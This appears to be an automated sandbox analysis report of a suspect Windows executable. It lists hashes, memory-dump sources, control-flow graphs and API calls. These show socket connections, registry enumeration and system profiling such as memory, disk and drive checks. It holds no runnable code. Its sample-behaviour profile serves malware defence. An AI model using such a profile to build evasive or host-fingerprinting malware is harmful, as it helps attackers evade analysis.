                                                          Start time:10:35:20
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\HZhObFuFNe.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\HZhObFuFNe.exe"
                                                          Imagebase:0xc20000
                                                          File size:4'470'784 bytes
                                                          MD5 hash:2BA7EE5357B8762915D320630E9A59B7
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:18.9%
                                                            Total number of Nodes:249
                                                            Total number of Limit Nodes:40
                                                            execution_graph 67535 c3d5e0 67536 c3d652 WSAStartup 67535->67536 67537 c3d5f0 67535->67537 67536->67537 67327 c5b3c0 67328 c5b3ee 67327->67328 67329 c5b3cb 67327->67329 67333 c276a0 67329->67333 67337 c59290 67329->67337 67330 c5b3ea 67334 c276c0 67333->67334 67335 c276e6 send 67333->67335 67334->67335 67336 c276c9 67334->67336 67335->67336 67336->67330 67338 c276a0 send 67337->67338 67339 c592e5 67338->67339 67340 c59335 WSAIoctl 67339->67340 67341 c59392 67339->67341 67340->67341 67342 c59366 67340->67342 67341->67330 67342->67341 67343 c59371 setsockopt 67342->67343 67343->67341 67344 c5e400 67345 c5e412 67344->67345 67347 c5e459 67344->67347 67348 c568b0 closesocket 67345->67348 67348->67347 67349 c5b400 67350 c5b425 67349->67350 67351 c5b40b 67349->67351 67354 c27770 67351->67354 67352 c5b421 67355 c27790 67354->67355 67356 c277b6 recv 67354->67356 67355->67356 67357 c27799 67355->67357 67356->67357 67357->67352 67538 cd4720 67542 cd4728 67538->67542 67539 cd4733 67541 cd4774 67542->67539 67549 cd476c 67542->67549 67550 cd5540 closesocket 67542->67550 67544 cd482e 67544->67549 67551 cd9270 67544->67551 67546 cd4860 67556 cd4950 67546->67556 67548 cd4878 67549->67548 67564 cd30a0 closesocket 67549->67564 67550->67544 67565 cda440 67551->67565 67553 cd9297 67555 cd92ab 67553->67555 67595 cdbbe0 closesocket 67553->67595 67555->67546 67557 cd4966 67556->67557 67561 cd49c5 67557->67561 67563 cd49b9 67557->67563 67597 cdb590 if_nametoindex if_indextoname 67557->67597 67559 cd4aa0 gethostname 67559->67561 67559->67563 67560 cd4a3e 67560->67561 67598 cdbbe0 closesocket 67560->67598 67561->67549 67563->67559 67563->67561 67564->67541 67593 cda46b 67565->67593 67566 cda4db 67567 cdaa03 RegOpenKeyExA 67566->67567 67579 cdad14 67566->67579 67568 cdaa27 RegQueryValueExA 67567->67568 67569 cdab70 RegOpenKeyExA 67567->67569 67570 cdaacc RegQueryValueExA 67568->67570 67571 cdaa71 67568->67571 67572 cdac34 RegOpenKeyExA 67569->67572 67590 cdab90 67569->67590 67573 cdab0e 67570->67573 67574 cdab66 RegCloseKey 67570->67574 67571->67570 67578 cdaa85 RegQueryValueExA 67571->67578 67575 cdacf8 RegOpenKeyExA 67572->67575 67592 cdac54 67572->67592 67573->67574 67582 cdab1e RegQueryValueExA 67573->67582 67574->67569 67576 cdad56 RegEnumKeyExA 67575->67576 67575->67579 67577 cdad9b 67576->67577 67576->67579 67580 cdae16 RegOpenKeyExA 67577->67580 67581 cdaab3 67578->67581 67579->67553 67583 cdaddf RegEnumKeyExA 67580->67583 67584 cdae34 RegQueryValueExA 67580->67584 67581->67570 67587 cdab4c 67582->67587 67583->67579 67583->67580 67585 cdaf43 RegQueryValueExA 67584->67585 67594 cdadaa 67584->67594 67586 cdb052 RegQueryValueExA 67585->67586 67585->67594 67588 cdadc7 RegCloseKey 67586->67588 67586->67594 67587->67574 67588->67583 67590->67572 67591 cdafa0 RegQueryValueExA 67591->67594 67592->67575 67593->67566 67596 cdb830 if_nametoindex if_indextoname 67593->67596 67594->67585 67594->67586 67594->67588 67594->67591 67595->67555 67596->67566 67597->67560 67598->67563 67358 cea080 67361 ce9740 67358->67361 67360 cea09b 67362 ce9780 67361->67362 67366 ce975d 67361->67366 67363 ce9925 RegOpenKeyExA 67362->67363 67362->67366 67364 ce995a RegQueryValueExA 67363->67364 67363->67366 67365 ce9986 RegCloseKey 67364->67365 67365->67366 67366->67360 67367 ceb180 67368 ceb19b 67367->67368 67374 ceb2e3 67367->67374 67371 ceb2a9 getsockname 67368->67371 67373 ceb020 closesocket 67368->67373 67368->67374 67375 ceaf30 67368->67375 67379 ceb060 67368->67379 67384 ceb020 67371->67384 67373->67368 67376 ceaf4c 67375->67376 67377 ceaf63 socket 67375->67377 67376->67377 67378 ceaf52 67376->67378 67377->67368 67378->67368 67383 ceb080 67379->67383 67380 ceb0b0 connect 67381 ceb0bf WSAGetLastError 67380->67381 67382 ceb0ea 67381->67382 67381->67383 67382->67368 67383->67380 67383->67381 67383->67382 67385 ceb029 67384->67385 67386 ceb052 67384->67386 67387 ceb04b closesocket 67385->67387 67388 ceb03e 67385->67388 67386->67368 67387->67386 67388->67368 67389 c231d7 67392 c231f4 67389->67392 67390 c23200 67391 c232dc CloseHandle 67391->67390 67392->67390 67392->67391 67393 c58b50 67394 c58b6b 67393->67394 67412 c58bb5 67393->67412 67395 c58bf3 67394->67395 67396 c58b8f 67394->67396 67394->67412 67413 c5a550 67395->67413 67432 c36e40 select 67396->67432 67399 c58bfc 67401 c58c35 67399->67401 67402 c58c1f connect 67399->67402 67409 c58cb2 67399->67409 67399->67412 67400 c58cd9 SleepEx 67406 c58d13 67400->67406 67428 c5a150 67401->67428 67402->67401 67403 c5a150 getsockname 67408 c58dff 67403->67408 67405 c58d43 67410 c5a150 getsockname 67405->67410 67406->67405 67406->67409 67408->67412 67433 c278b0 closesocket 67408->67433 67409->67403 67409->67408 67409->67412 67410->67412 67411 c58ba1 67411->67400 67411->67409 67411->67412 67414 c5a575 67413->67414 67417 c5a597 67414->67417 67435 c275e0 67414->67435 67416 c278b0 closesocket 67418 c5a713 67416->67418 67419 c5a811 setsockopt 67417->67419 67424 c5a83b 67417->67424 67426 c5a69b 67417->67426 67418->67399 67419->67424 67421 c5af56 67422 c5af5d 67421->67422 67421->67426 67422->67418 67423 c5a150 getsockname 67422->67423 67423->67418 67424->67426 67427 c5abe1 67424->67427 67441 c56be0 select closesocket 67424->67441 67426->67416 67426->67418 67427->67426 67440 c867e0 ioctlsocket 67427->67440 67429 c5a15f 67428->67429 67431 c5a1d0 67428->67431 67430 c5a181 getsockname 67429->67430 67429->67431 67430->67431 67431->67411 67432->67411 67434 c278c5 67433->67434 67434->67412 67436 c27607 socket 67435->67436 67437 c275ef 67435->67437 67438 c2762b 67436->67438 67437->67436 67439 c27643 67437->67439 67438->67417 67439->67417 67440->67421 67441->67427 67442 c22f17 67449 c22f2c 67442->67449 67443 c231d3 67444 c22fb3 RegOpenKeyExA 67444->67449 67445 c2315c RegEnumKeyExA 67445->67449 67446 c23046 RegOpenKeyExA 67447 c23089 RegQueryValueExA 67446->67447 67446->67449 67448 c2313b RegCloseKey 67447->67448 67447->67449 67448->67449 67449->67443 67449->67444 67449->67445 67449->67446 67449->67448 67599 c595b0 67600 c595c8 67599->67600 67602 c595fd 67599->67602 67601 c5a150 getsockname 67600->67601 67600->67602 67601->67602 67450 109ed10 67452 109ed5a 67450->67452 67451 109ed73 67452->67451 67453 109ee60 67452->67453 67454 109ee16 67452->67454 67459 fab4e0 _lock 67453->67459 67455 109ee54 67454->67455 67460 fab4e0 _lock 67454->67460 67457 109ee89 67459->67457 67460->67457 67461 fab160 Sleep 67462 c23d5e 67465 c23d30 67462->67465 67464 c23d90 67465->67462 67465->67464 67466 c30ab0 67465->67466 67469 c305b0 67466->67469 67468 c30acd 67468->67465 67472 c305bd 67469->67472 67475 c307c7 67469->67475 67470 c30707 WSAEventSelect 67470->67472 67470->67475 67471 c307ef 67471->67475 67478 c30847 67471->67478 67479 c36fa0 67471->67479 67472->67470 67472->67471 67474 c276a0 send 67472->67474 67472->67475 67474->67472 67475->67468 67476 c309e8 WSAEnumNetworkEvents 67477 c309d0 WSAEventSelect 67476->67477 67476->67478 67477->67476 67477->67478 67478->67475 67478->67476 67478->67477 67481 c36fd4 67479->67481 67482 c36feb 67479->67482 67480 c37207 select 67480->67482 67481->67480 67481->67482 67482->67478 67483 cd5a50 67484 cd5a58 67483->67484 67485 cd5ea0 67483->67485 67486 cd5b50 67484->67486 67494 cd5a99 67484->67494 67498 cd5b88 67484->67498 67489 cd5b7a 67486->67489 67490 cd5eb4 67486->67490 67486->67498 67487 cd5e96 67513 ce9480 closesocket 67487->67513 67504 cd70a0 67489->67504 67514 cd6f10 socket ioctlsocket connect getsockname closesocket 67490->67514 67493 cd5ec2 67493->67493 67497 cd70a0 6 API calls 67494->67497 67494->67498 67511 cd6f10 socket ioctlsocket connect getsockname closesocket 67494->67511 67497->67494 67498->67487 67500 cea920 67498->67500 67512 ce9320 closesocket 67498->67512 67501 cea944 67500->67501 67502 cea94b 67501->67502 67503 cea977 send 67501->67503 67502->67498 67503->67498 67507 cd70ae 67504->67507 67506 cd71a7 67506->67498 67507->67506 67508 cd717f 67507->67508 67515 cea8c0 67507->67515 67519 cd71c0 socket ioctlsocket connect getsockname 67507->67519 67508->67506 67520 ce9320 closesocket 67508->67520 67511->67494 67512->67498 67513->67485 67514->67493 67516 cea8e6 67515->67516 67517 cea903 recvfrom 67515->67517 67516->67517 67518 cea8ed 67516->67518 67517->67518 67518->67507 67519->67507 67520->67506 67603 c229ff FindFirstFileA 67604 c22a31 67603->67604 67605 c22a5c RegOpenKeyExA 67604->67605 67606 c22a93 67605->67606 67607 c22ade CharUpperA 67606->67607 67608 c22b0a 67607->67608 67609 c22bf9 QueryFullProcessImageNameA 67608->67609 67610 c22c3b CloseHandle 67609->67610 67612 c22c64 67610->67612 67611 c22df1 CloseHandle 67613 c22e23 67611->67613 67612->67611 67521 c2255d 67522 fa9f70 67521->67522 67523 c2256c GetSystemInfo 67522->67523 67524 c22589 67523->67524 67525 c225a0 GlobalMemoryStatusEx 67524->67525 67530 c225ec 67525->67530 67526 c2263c GetDriveTypeA 67528 c22655 GetDiskFreeSpaceExA 67526->67528 67526->67530 67527 c22762 67529 c227d6 KiUserCallbackDispatcher 67527->67529 67528->67530 67531 c227f8 67529->67531 67530->67526 67530->67527 67532 c228d9 FindFirstFileW 67531->67532 67533 c22906 FindNextFileW 67532->67533 67534 c22928 67532->67534 67533->67533 67533->67534

                                                            Executed Functions

                                                            Function 00C5F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                            • API String ID: 0-1590685507
                                                            • Opcode ID: 0045df0a583e9e99e430bcbb08ccd23e589c2b460265516a5c773d20f383afb4
                                                            • Instruction ID: 4c596ed00dd1b71d54cfdefbcf95535789bc4d04ad03640f246c52c1922a0276
                                                            • Opcode Fuzzy Hash: 0045df0a583e9e99e430bcbb08ccd23e589c2b460265516a5c773d20f383afb4
                                                            • Instruction Fuzzy Hash: F2C2B135A043449FD728CF29C484B6AB7E1BF84314F15866DFC999B262D770EE89CB81
                                                            Function 00C2255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 00C22579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00C225CC
                                                            • GetDriveTypeA.KERNELBASE ref: 00C22647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00C2267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 00C227E2
                                                            • FindFirstFileW.KERNELBASE ref: 00C228F8
                                                            • FindNextFileW.KERNELBASE ref: 00C2291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                            • String ID: @$`
                                                            • API String ID: 3271271169-3318628307
                                                            • Opcode ID: 71b8ca591d456131f8d326e70a65b458278f16b1ce447daf281188b8867524d1
                                                            • Instruction ID: 183177194a1fc18a348525825c895ddb921c62a0e0e83669fbd45fd33fdfdd71
                                                            • Opcode Fuzzy Hash: 71b8ca591d456131f8d326e70a65b458278f16b1ce447daf281188b8867524d1
                                                            • Instruction Fuzzy Hash: 47D1A4B49043199FCB10EFA8C58469EBBF4BF88344F40896DE898D7355E7349A84CF92
                                                            Function 00C229FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1273 c229ff-c22a2f FindFirstFileA 1274 c22a31-c22a36 1273->1274 1275 c22a38 1273->1275 1276 c22a3d-c22a91 call 10a1150 call 10a11e0 RegOpenKeyExA 1274->1276 1275->1276 1281 c22a93-c22a98 1276->1281 1282 c22a9a 1276->1282 1283 c22a9f-c22b0c call 10a1150 call 10a11e0 CharUpperA call fa8da0 1281->1283 1282->1283 1291 c22b15 1283->1291 1292 c22b0e-c22b13 1283->1292 1293 c22b1a-c22b92 call 10a1150 call 10a11e0 call fa8e80 call fa8e70 1291->1293 1292->1293 1302 c22b94-c22ba3 1293->1302 1303 c22bcc-c22c66 QueryFullProcessImageNameA CloseHandle call fa8da0 1293->1303 1306 c22bb0-c22bc0 call fa8e68 1302->1306 1307 c22ba5-c22bae 1302->1307 1313 c22c68-c22c6d 1303->1313 1314 c22c6f 1303->1314 1310 c22bc5-c22bca 1306->1310 1307->1303 1310->1302 1310->1303 1315 c22c74-c22ce9 call 10a1150 call 10a11e0 call fa8e80 call fa8e70 1313->1315 1314->1315 1324 c22dcf-c22e1c call 10a1150 call 10a11e0 CloseHandle 1315->1324 1325 c22cef-c22d49 call fa8bb0 call fa8da0 1315->1325 1334 c22e23-c22e2e 1324->1334 1338 c22d4b-c22d63 call fa8da0 1325->1338 1339 c22d99-c22dad 1325->1339 1336 c22e30-c22e35 1334->1336 1337 c22e37 1334->1337 1340 c22e3c-c22ed6 call 10a1150 call 10a11e0 1336->1340 1337->1340 1338->1339 1346 c22d65-c22d7d call fa8da0 1338->1346 1339->1324 1355 c22eea 1340->1355 1356 c22ed8-c22ee1 1340->1356 1346->1339 1351 c22d7f-c22d97 call fa8da0 1346->1351 1351->1339 1357 c22daf-c22dc9 call fa8e68 1351->1357 1359 c22eef-c22f16 call 10a1150 call 10a11e0 1355->1359 1356->1355 1358 c22ee3-c22ee8 1356->1358 1357->1324 1357->1325 1358->1359
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: 9ba0260ac5a4cc8c62c6e2bd6c43b414af62bb19611038765090097227e988de
                                                            • Instruction ID: 5df5f0e0600869254e391e4c8f739d4dae720b14a70ea2c05880929e3d666642
                                                            • Opcode Fuzzy Hash: 9ba0260ac5a4cc8c62c6e2bd6c43b414af62bb19611038765090097227e988de
                                                            • Instruction Fuzzy Hash: E2E115B49043159FCB10EFA8D98469DBBF4AF84344F408969E899D7391E734DA84DF42
                                                            Function 00C305B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1547 c305b0-c305b7 1548 c307ee 1547->1548 1549 c305bd-c305d4 1547->1549 1550 c307e7-c307ed 1549->1550 1551 c305da-c305e6 1549->1551 1550->1548 1551->1550 1552 c305ec-c305f0 1551->1552 1553 c307c7-c307cc 1552->1553 1554 c305f6-c30620 call c37350 call c270b0 1552->1554 1553->1550 1559 c30622-c30624 1554->1559 1560 c3066a-c3068c call c5dec0 1554->1560 1561 c30630-c30655 call c270d0 call c303c0 call c37450 1559->1561 1566 c30692-c306a0 1560->1566 1567 c307d6-c307e3 call c37380 1560->1567 1587 c3065b-c30668 call c270e0 1561->1587 1588 c307ce 1561->1588 1570 c306a2-c306a4 1566->1570 1571 c306f4-c306f6 1566->1571 1567->1550 1572 c306b0-c306e4 call c373b0 1570->1572 1574 c307ef-c3082b call c33000 1571->1574 1575 c306fc-c306fe 1571->1575 1572->1567 1586 c306ea-c306ee 1572->1586 1591 c30831-c30837 1574->1591 1592 c30a2f-c30a35 1574->1592 1579 c3072c-c30754 1575->1579 1583 c30756-c3075b 1579->1583 1584 c3075f-c3078b 1579->1584 1589 c30707-c30719 WSAEventSelect 1583->1589 1590 c3075d 1583->1590 1602 c30791-c30796 1584->1602 1603 c30700-c30703 1584->1603 1586->1572 1596 c306f0 1586->1596 1587->1560 1587->1561 1588->1567 1589->1567 1600 c3071f 1589->1600 1601 c30723-c30726 1590->1601 1594 c30861-c3087e 1591->1594 1595 c30839-c30842 call c36fa0 1591->1595 1597 c30a37-c30a3a 1592->1597 1598 c30a3c-c30a52 1592->1598 1614 c30882-c3088d 1594->1614 1608 c30847-c3084c 1595->1608 1596->1571 1597->1598 1598->1567 1605 c30a58-c30a81 call c32f10 1598->1605 1600->1601 1601->1574 1601->1579 1602->1603 1607 c3079c-c307c2 call c276a0 1602->1607 1603->1589 1605->1567 1620 c30a87-c30a97 call c36df0 1605->1620 1607->1603 1612 c30852 1608->1612 1613 c30a9c-c30aa4 1608->1613 1612->1594 1617 c30854-c3085f 1612->1617 1613->1567 1618 c30893-c308b1 1614->1618 1619 c30970-c30975 1614->1619 1617->1614 1623 c308c8-c308f7 1618->1623 1621 c3097b-c30989 call c270b0 1619->1621 1622 c30a19-c30a2c 1619->1622 1620->1567 1621->1622 1630 c3098f-c3099e 1621->1630 1622->1592 1631 c308f9-c308fb 1623->1631 1632 c308fd-c30925 1623->1632 1634 c309b0-c309c1 call c270d0 1630->1634 1633 c30928-c3093f 1631->1633 1632->1633 1638 c308b3-c308c2 1633->1638 1639 c30945-c3096b 1633->1639 1640 c309c3-c309c7 1634->1640 1641 c309a0-c309ae call c270e0 1634->1641 1638->1619 1638->1623 1639->1638 1642 c309e8-c30a03 WSAEnumNetworkEvents 1640->1642 1641->1622 1641->1634 1644 c309d0-c309e6 WSAEventSelect 1642->1644 1645 c30a05-c30a17 1642->1645 1644->1641 1644->1642 1645->1644
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00C30712
                                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C309DC
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C309FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: multi.c
                                                            • API String ID: 2170980988-214371023
                                                            • Opcode ID: ab836f8512b5a61b2e7793bf9b2751524aeff284206d2e06c48196d4ede4a830
                                                            • Instruction ID: be3c37cd01ba3915d01ea396c4ffad4c70e7c06909436f1881fdbc84f73c5341
                                                            • Opcode Fuzzy Hash: ab836f8512b5a61b2e7793bf9b2751524aeff284206d2e06c48196d4ede4a830
                                                            • Instruction Fuzzy Hash: 31D1F3726283019FE710DF24D8A1BAB77E9FF95304F14492CF89587242E774EA48DB92
                                                            Function 00CEB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1684 ceb180-ceb195 1685 ceb19b-ceb1a2 1684->1685 1686 ceb3e0-ceb3e7 1684->1686 1687 ceb1b0-ceb1b9 1685->1687 1687->1687 1688 ceb1bb-ceb1bd 1687->1688 1688->1686 1689 ceb1c3-ceb1d0 1688->1689 1691 ceb3db 1689->1691 1692 ceb1d6-ceb1f2 1689->1692 1691->1686 1693 ceb229-ceb22d 1692->1693 1694 ceb3e8-ceb417 1693->1694 1695 ceb233-ceb246 1693->1695 1703 ceb41d-ceb429 1694->1703 1704 ceb582-ceb589 1694->1704 1696 ceb248-ceb24b 1695->1696 1697 ceb260-ceb264 1695->1697 1698 ceb24d-ceb256 1696->1698 1699 ceb215-ceb223 1696->1699 1701 ceb269-ceb286 call ceaf30 1697->1701 1698->1701 1699->1693 1702 ceb315-ceb33c call fa8b00 1699->1702 1710 ceb288-ceb2a3 call ceb060 1701->1710 1711 ceb2f0-ceb301 1701->1711 1718 ceb3bf-ceb3ca 1702->1718 1719 ceb342-ceb347 1702->1719 1707 ceb42b-ceb433 call ceb590 1703->1707 1708 ceb435-ceb44c call ceb590 1703->1708 1707->1708 1721 ceb44e-ceb456 call ceb590 1708->1721 1722 ceb458-ceb471 call ceb590 1708->1722 1729 ceb2a9-ceb2c7 getsockname call ceb020 1710->1729 1730 ceb200-ceb213 call ceb020 1710->1730 1711->1699 1733 ceb307-ceb310 1711->1733 1723 ceb3cc-ceb3d9 1718->1723 1725 ceb349-ceb358 1719->1725 1726 ceb384-ceb38f 1719->1726 1721->1722 1742 ceb48c-ceb4a7 1722->1742 1743 ceb473-ceb487 1722->1743 1723->1686 1727 ceb360-ceb382 1725->1727 1726->1718 1728 ceb391-ceb3a5 1726->1728 1727->1726 1727->1727 1734 ceb3b0-ceb3bd 1728->1734 1740 ceb2cc-ceb2dd 1729->1740 1730->1699 1733->1723 1734->1718 1734->1734 1740->1699 1744 ceb2e3 1740->1744 1745 ceb4a9-ceb4b1 call ceb660 1742->1745 1746 ceb4b3-ceb4cb call ceb660 1742->1746 1743->1704 1744->1733 1745->1746 1751 ceb4cd-ceb4d5 call ceb660 1746->1751 1752 ceb4d9-ceb4f5 call ceb660 1746->1752 1751->1752 